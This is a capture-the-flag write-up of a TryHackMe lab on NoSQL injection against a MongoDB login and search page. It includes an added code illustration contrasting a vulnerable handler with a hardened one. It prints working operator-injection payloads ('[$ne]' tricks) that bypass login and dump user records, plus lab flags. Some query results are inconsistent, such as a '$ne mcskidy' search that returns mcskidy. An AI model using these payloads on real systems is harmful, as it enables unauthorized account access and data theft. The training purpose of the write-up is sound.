Advent Of Cyber 3 - Day 7

Posted on Dec 7, 2021
tl;dr: NoSQL injection (NoSQLi) against a MongoDB-backed login and search page

Interact with MongoDB after ssh'ing to the box:

```
> use flagdb
> show collections
> db.flagColl.find()
{ "_id" : ObjectId("618806af0afbc09bdf42bd6a"), "flag" : "THM{8814a5e6662a9763f7df23ee59d944f9}" }
```

Interact with the web page on: http://10.10.137.111/login

Catch a login request with Burp Suite:

```
POST /login HTTP/1.1
Host: 10.10.137.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.137.111
Connection: close
Referer: http://10.10.137.111/login
Cookie: connect.sid=s%3ATiJbg_zkCKqm-CXR13un1POmfLQWnW3c.6hOaaBdHJq3%2FxJxxprL5uXHFmrqC7%2FJpprEowkA2PB0
Upgrade-Insecure-Requests: 1

username=admin&password=admin
```

Because the page says that it's MongoDB, we can try to inject query operators through the input fields instead of the plain `username=admin&password=admin` body.


Commonly used MongoDB operators when injecting:

- `$eq` - matches records that are equal to a certain value
- `$ne` - matches records that are not equal to a certain value
- `$gt` - matches records that are greater than a certain value
- `$where` - matches records based on a JavaScript condition
- `$exists` - matches records that have a certain field
- `$regex` - matches records that satisfy a certain regular expression

Modify the request body to `username=admin&password[$ne]=nisse`. The bracket syntax is parsed into a nested object, so the password condition becomes `{ $ne: "nisse" }`, which is true for any stored password other than `nisse`; the whole query therefore matches the admin record.
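The mechanism behind that step, as an added illustration that is not code from the room or from this writeup: a simplified model of the bracket syntax that Express's extended body parser (the `qs` library) accepts, a tiny evaluator for the operators listed above, and a login handler in its vulnerable and hardened forms. `parseExtended`, `loginVulnerable`, `loginHardened` and the sample user store are assumptions made for the example, not the target application's real code.

```javascript
// Added illustration (not the room's or the writeup's code): why
// "password[$ne]=nisse" turns into a MongoDB operator and how a login
// handler can refuse it. parseExtended() is a simplified model of the
// bracket syntax accepted by Express's extended body parser (qs); it is an
// assumption about the target app, not its real code.
'use strict';

// Parse "a=1&b[$ne]=2" into { a: '1', b: { $ne: '2' } } (one level of nesting).
function parseExtended(body) {
  const out = {};
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const key = decodeURIComponent(i < 0 ? pair : pair.slice(0, i));
    const val = decodeURIComponent((i < 0 ? '' : pair.slice(i + 1)).replace(/\+/g, ' '));
    const m = /^([^[\]]+)\[([^[\]]*)\]$/.exec(key);
    if (m) {
      const parent = out[m[1]] && typeof out[m[1]] === 'object' ? out[m[1]] : {};
      parent[m[2]] = val;
      out[m[1]] = parent;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Minimal evaluator for the operators listed above, enough to show why
// { password: { $ne: 'nisse' } } matches a user whose password is not 'nisse'.
function fieldMatches(actual, cond) {
  if (cond === null || typeof cond !== 'object') return actual === cond; // literal
  return Object.entries(cond).every(([op, v]) => {
    switch (op) {
      case '$eq': return actual === v;
      case '$ne': return actual !== v;
      case '$gt': return actual > v;
      case '$exists': return (actual !== undefined) === Boolean(v);
      case '$regex': return new RegExp(v).test(String(actual));
      default: return false; // unsupported operator never matches
    }
  });
}

function findOne(collection, filter) {
  const hit = collection.find(doc =>
    Object.entries(filter).every(([field, cond]) => fieldMatches(doc[field], cond)));
  return hit || null;
}

// Constructed sample user store (placeholder values, not the room's data).
const USERS = [{ username: 'admin', password: 's3cret-placeholder', role: 'admin' }];

// Vulnerable: the parsed body is spliced straight into the query object,
// so a nested object from the client becomes an operator.
function loginVulnerable(body) {
  const { username, password } = parseExtended(body);
  return findOne(USERS, { username, password });
}

// Hardened: operators can only arrive as objects, so insist on strings and
// wrap the values in $eq so the database treats them as literals.
function loginHardened(body) {
  const { username, password } = parseExtended(body);
  if (typeof username !== 'string' || typeof password !== 'string') {
    return null; // reject; worth logging as a NoSQL injection probe
  }
  return findOne(USERS, { username: { $eq: username }, password: { $eq: password } });
}
```

With the body from the request above, `loginVulnerable` returns the admin record even though no password was supplied, while `loginHardened` returns `null` and only succeeds for the real credentials. The type check is the essential control; schema validation at the route (or a sanitizer that strips `$`-prefixed keys) achieves the same effect.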

The page then redirects to http://10-10-137-111.p.thmlabs.com/dashboard

with a link to the flag: Flag: THM{b6b304f5d5834a4d089b570840b467a8}

Use the search page http://10-10-137-111.p.thmlabs.com/search to list all users with role 'guest'.

Catch the request with Burp and send it to Repeater:

```
GET /search?username=db.find(guest&role=user HTTP/1.1
Host: 10-10-137-111.p.thmlabs.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10-10-137-111.p.thmlabs.com/search
Cookie: connect.sid=s%3AgGcqHIpnAhj3DaRDXMGrd78Bizik7Kwx.56QQxY0BaC7cpqYEOSFdjk7C27tWLGOqmCweYedHlTQ
Upgrade-Insecure-Requests: 1
```

Modify the GET parameter and play around, starting from: `GET /search?username=db.find(guest&role=user HTTP/1.1`

The address bar can also be used: 10-10-137-111.p.thmlabs.com/search?username[$ne]grinch&role=guest

```
Username details
ID:61749a80b534d3a130391b92:guest:guest
Username details
ID:61850f642f70bd35768c82f1:test:guest
Username details
ID:61850fb42f70bd35768c82f2:THM{2ec099f2d602cc4968c5267970be1326}:guest
```

And another flag is found: THM{2ec099f2d602cc4968c5267970be1326}

Retrieve the mcskidy record from the gift-search page: http://10-10-137-111.p.thmlabs.com/search?username[$ne]mcskidy&role=admin

```
Username details
ID:61733f3a72e3abc63d253929:admin:admin
Username details
ID:61749a80b534d3a130391b91:tryhackme:admin
Username details
ID:6184f516ef6da50433f100f4:mcskidy:admin
```

In Burp, change the request line to `GET /search?username[$ne]mcskidy&role=admin HTTP/1.1` and you get the same response as when tampering with the address bar.

EOF